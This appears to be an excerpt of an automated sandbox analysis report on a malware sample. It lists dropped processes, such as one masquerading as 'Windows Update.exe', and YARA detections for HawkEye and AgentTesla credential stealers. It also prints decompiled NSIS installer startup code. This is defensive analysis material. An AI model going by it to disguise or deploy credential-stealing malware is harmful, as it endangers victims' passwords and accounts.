                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                              General

                                                                                              Start time:13:39:29
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\4.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:586861 bytes
                                                                                              MD5 hash:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.798585509.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.798585509.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.939895279.00000000023C0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.939895279.00000000023C0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.797295676.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.797295676.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.943516760.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.943516760.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000001.801556734.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000001.801556734.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.940107209.0000000002522000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.940107209.0000000002522000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.932861331.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.932861331.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:52
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              General

                                                                                              Start time:13:39:58
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.921284802.0000000007700000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.921256513.00000000076B0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                                Executed Functions

                                                                                                C-Code - Quality: 83%
                                                                                                			_entry_() {
                                                                                                				struct _SHFILEINFOA _v360;
                                                                                                				struct _SECURITY_ATTRIBUTES* _v376;
                                                                                                				char _v380;
                                                                                                				CHAR* _v384;
                                                                                                				char _v396;
                                                                                                				int _v400;
                                                                                                				int _v404;
                                                                                                				CHAR* _v408;
                                                                                                				intOrPtr _v412;
                                                                                                				int _v416;
                                                                                                				intOrPtr _v420;
                                                                                                				struct _SECURITY_ATTRIBUTES* _v424;
                                                                                                				void* _v432;
                                                                                                				int _t34;
                                                                                                				CHAR* _t39;
                                                                                                				char* _t42;
                                                                                                				signed int _t44;
                                                                                                				void* _t48;
                                                                                                				intOrPtr _t50;
                                                                                                				signed int _t52;
                                                                                                				signed int _t55;
                                                                                                				int _t56;
                                                                                                				signed int _t60;
                                                                                                				intOrPtr _t71;
                                                                                                				intOrPtr _t77;
                                                                                                				void* _t79;
                                                                                                				void* _t89;
                                                                                                				void* _t91;
                                                                                                				char* _t96;
                                                                                                				signed int _t97;
                                                                                                				void* _t98;
                                                                                                				signed int _t99;
                                                                                                				signed int _t100;
                                                                                                				signed int _t103;
                                                                                                				CHAR* _t105;
                                                                                                				signed int _t106;
                                                                                                				intOrPtr _t113;
                                                                                                				char _t120;
                                                                                                
                                                                                                				_v376 = 0;
                                                                                                				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                				_t99 = 0;
                                                                                                				_v380 = 0x20;
                                                                                                				__imp__#17();
                                                                                                				_t34 = SetErrorMode(0x8001); // executed
                                                                                                				__imp__OleInitialize(0); // executed
                                                                                                				 *0x42ec18 = _t34;
                                                                                                				 *0x42eb64 = E00405C49(8);
                                                                                                				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
                                                                                                				E0040592B("jpfyweowskz Setup", "NSIS Error");
                                                                                                				_t39 = GetCommandLineA();
                                                                                                				_t96 = "\"C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe\" ";
                                                                                                				E0040592B(_t96, _t39);
                                                                                                				 *0x42eb60 = GetModuleHandleA(0);
                                                                                                				_t42 = _t96;
                                                                                                				if("\"C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe\" " == 0x22) {
                                                                                                					_v404 = 0x22;
                                                                                                					_t42 =  &M00434001;
                                                                                                				}
                                                                                                				_t44 = CharNextA(E00405449(_t42, _v404));
                                                                                                				_v404 = _t44;
                                                                                                				while(1) {
                                                                                                					_t91 =  *_t44;
                                                                                                					_t109 = _t91;
                                                                                                					if(_t91 == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					__eflags = _t91 - 0x20;
                                                                                                					if(_t91 != 0x20) {
                                                                                                						L5:
                                                                                                						__eflags =  *_t44 - 0x22;
                                                                                                						_v404 = 0x20;
                                                                                                						if( *_t44 == 0x22) {
                                                                                                							_t44 = _t44 + 1;
                                                                                                							__eflags = _t44;
                                                                                                							_v404 = 0x22;
                                                                                                						}
                                                                                                						__eflags =  *_t44 - 0x2f;
                                                                                                						if( *_t44 != 0x2f) {
                                                                                                							L15:
                                                                                                							_t44 = E00405449(_t44, _v404);
                                                                                                							__eflags =  *_t44 - 0x22;
                                                                                                							if(__eflags == 0) {
                                                                                                								_t44 = _t44 + 1;
                                                                                                								__eflags = _t44;
                                                                                                							}
                                                                                                							continue;
                                                                                                						} else {
                                                                                                							_t44 = _t44 + 1;
                                                                                                							__eflags =  *_t44 - 0x53;
                                                                                                							if( *_t44 == 0x53) {
                                                                                                								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                                                                                								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                                                                                									_t99 = _t99 | 0x00000002;
                                                                                                									__eflags = _t99;
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags =  *_t44 - 0x4352434e;
                                                                                                							if( *_t44 == 0x4352434e) {
                                                                                                								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                                                                                								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                                                                                									_t99 = _t99 | 0x00000004;
                                                                                                									__eflags = _t99;
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                                                                                							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                                                                                								 *((intOrPtr*)(_t44 - 2)) = 0;
                                                                                                								_t45 = _t44 + 2;
                                                                                                								__eflags = _t44 + 2;
                                                                                                								E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
                                                                                                								L20:
                                                                                                								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                                								GetTempPathA(0x400, _t105);
                                                                                                								_t48 = E004030AF(_t109);
                                                                                                								_t110 = _t48;
                                                                                                								if(_t48 != 0) {
                                                                                                									L22:
                                                                                                									DeleteFileA("1033"); // executed
                                                                                                									_t50 = E00402C0B(_t111, _t99); // executed
                                                                                                									_v412 = _t50;
                                                                                                									if(_t50 != 0) {
                                                                                                										L32:
                                                                                                										E00403464();
                                                                                                										__imp__OleUninitialize();
                                                                                                										if(_v408 == 0) {
                                                                                                											__eflags =  *0x42ebf4; // 0x0
                                                                                                											if(__eflags != 0) {
                                                                                                												_t106 = E00405C49(3);
                                                                                                												_t100 = E00405C49(4);
                                                                                                												_t55 = E00405C49(5);
                                                                                                												__eflags = _t106;
                                                                                                												_t97 = _t55;
                                                                                                												if(_t106 != 0) {
                                                                                                													__eflags = _t100;
                                                                                                													if(_t100 != 0) {
                                                                                                														__eflags = _t97;
                                                                                                														if(_t97 != 0) {
                                                                                                															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                                                                                															__eflags = _t60;
                                                                                                															if(_t60 != 0) {
                                                                                                																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                                                                                																_v416 = 1;
                                                                                                																_v404 = 2;
                                                                                                																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												_t56 = ExitWindowsEx(2, 0);
                                                                                                												__eflags = _t56;
                                                                                                												if(_t56 == 0) {
                                                                                                													E0040140B(9);
                                                                                                												}
                                                                                                											}
                                                                                                											_t52 =  *0x42ec0c; // 0xffffffff
                                                                                                											__eflags = _t52 - 0xffffffff;
                                                                                                											if(_t52 != 0xffffffff) {
                                                                                                												_v400 = _t52;
                                                                                                											}
                                                                                                											ExitProcess(_v400);
                                                                                                										}
                                                                                                										E004051EC(_v408, 0x200010);
                                                                                                										ExitProcess(2);
                                                                                                									}
                                                                                                									_t113 =  *0x42eb7c; // 0x0
                                                                                                									if(_t113 == 0) {
                                                                                                										L31:
                                                                                                										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
                                                                                                										_v400 = E00403489();
                                                                                                										goto L32;
                                                                                                									}
                                                                                                									_t103 = E00405449(_t96, 0);
                                                                                                									while(_t103 >= _t96) {
                                                                                                										__eflags =  *_t103 - 0x3d3f5f20;
                                                                                                										if(__eflags == 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t103 = _t103 - 1;
                                                                                                										__eflags = _t103;
                                                                                                									}
                                                                                                									_t115 = _t103 - _t96;
                                                                                                									_v408 = "Error launching installer";
                                                                                                									if(_t103 < _t96) {
                                                                                                										lstrcatA(_t105, "~nsu.tmp");
                                                                                                										_t101 = "C:\\Users\\jones\\Desktop";
                                                                                                										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
                                                                                                											goto L32;
                                                                                                										}
                                                                                                										CreateDirectoryA(_t105, 0);
                                                                                                										SetCurrentDirectoryA(_t105);
                                                                                                										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                                                                										if(_t120 == 0) {
                                                                                                											E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
                                                                                                										}
                                                                                                										E0040592B(0x42f000, _v396);
                                                                                                										 *0x42f400 = 0x41;
                                                                                                										_t98 = 0x1a;
                                                                                                										do {
                                                                                                											_t71 =  *0x42eb70; // 0x5ff628
                                                                                                											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
                                                                                                											DeleteFileA(0x428b90);
                                                                                                											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe", 0x428b90, 1) != 0) {
                                                                                                												_push(0);
                                                                                                												_push(0x428b90);
                                                                                                												E00405679();
                                                                                                												_t77 =  *0x42eb70; // 0x5ff628
                                                                                                												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
                                                                                                												_t79 = E0040518B(0x428b90);
                                                                                                												if(_t79 != 0) {
                                                                                                													CloseHandle(_t79);
                                                                                                													_v416 = 0;
                                                                                                												}
                                                                                                											}
                                                                                                											 *0x42f400 =  *0x42f400 + 1;
                                                                                                											_t98 = _t98 - 1;
                                                                                                										} while (_t98 != 0);
                                                                                                										_push(0);
                                                                                                										_push(_t105);
                                                                                                										E00405679();
                                                                                                										goto L32;
                                                                                                									}
                                                                                                									 *_t103 = 0;
                                                                                                									_t104 = _t103 + 4;
                                                                                                									if(E004054FF(_t115, _t103 + 4) == 0) {
                                                                                                										goto L32;
                                                                                                									}
                                                                                                									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                                                									E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                                                									_v424 = 0;
                                                                                                									goto L31;
                                                                                                								}
                                                                                                								GetWindowsDirectoryA(_t105, 0x3fb);
                                                                                                								lstrcatA(_t105, "\\Temp");
                                                                                                								_t89 = E004030AF(_t110);
                                                                                                								_t111 = _t89;
                                                                                                								if(_t89 == 0) {
                                                                                                									goto L32;
                                                                                                								}
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							goto L15;
                                                                                                						}
                                                                                                					} else {
                                                                                                						goto L4;
                                                                                                					}
                                                                                                					do {
                                                                                                						L4:
                                                                                                						_t44 = _t44 + 1;
                                                                                                						__eflags =  *_t44 - 0x20;
                                                                                                					} while ( *_t44 == 0x20);
                                                                                                					goto L5;
                                                                                                				}
                                                                                                				goto L20;
                                                                                                			}


                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 00403102
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                                                                                                • OleInitialize.OLE32(00000000), ref: 00403114
                                                                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                                                                                  • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,jpfyweowskz Setup,NSIS Error), ref: 00405938
                                                                                                • GetCommandLineA.KERNEL32(jpfyweowskz Setup,NSIS Error), ref: 00403151
                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 00403164
                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000020), ref: 0040318F
                                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
